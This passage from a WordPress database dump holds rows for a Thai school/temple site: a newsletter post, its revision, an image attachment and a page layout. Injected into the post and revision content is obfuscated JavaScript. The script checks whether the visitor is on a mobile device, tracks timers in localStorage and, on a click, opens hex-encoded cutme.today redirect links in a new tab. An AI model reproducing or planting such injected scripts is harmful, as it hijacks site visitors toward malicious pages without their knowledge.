|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','จดหมายข่าว','','publish','open','open','','%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7','','','2024-07-29 18:53:57','2024-07-29 11:53:57','',0,'http://watprato.ssk.in.th/?p=127',0,'post','',0),
(128,1,'2024-07-29 18:53:47','2024-07-29 11:53:47','','450250828_122162185154202781_8649375950099252526_n (1)','','inherit','open','closed','','450250828_122162185154202781_8649375950099252526_n-1','','','2024-07-29 18:53:47','2024-07-29 11:53:47','',127,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/450250828_122162185154202781_8649375950099252526_n-1.jpg',0,'attachment','image/jpeg',0),
(129,1,'2024-07-29 18:53:56','2024-07-29 11:53:56','<!-- wp:generateblocks/image {\"uniqueId\":\"1eea8d01\",\"mediaId\":128,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-1eea8d01\"><img class=\"gb-image gb-image-1eea8d01\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/450250828_122162185154202781_8649375950099252526_n-1.jpg\" alt=\"\" title=\"450250828_122162185154202781_8649375950099252526_n (1)\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','จดหมายข่าว','','inherit','closed','closed','','127-revision-v1','','','2024-07-29 18:53:56','2024-07-29 11:53:56','',127,'http://watprato.ssk.in.th/?p=129',0,'revision','',0),
(130,1,'2024-07-29 18:54:59','2024-07-29 11:54:59','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem 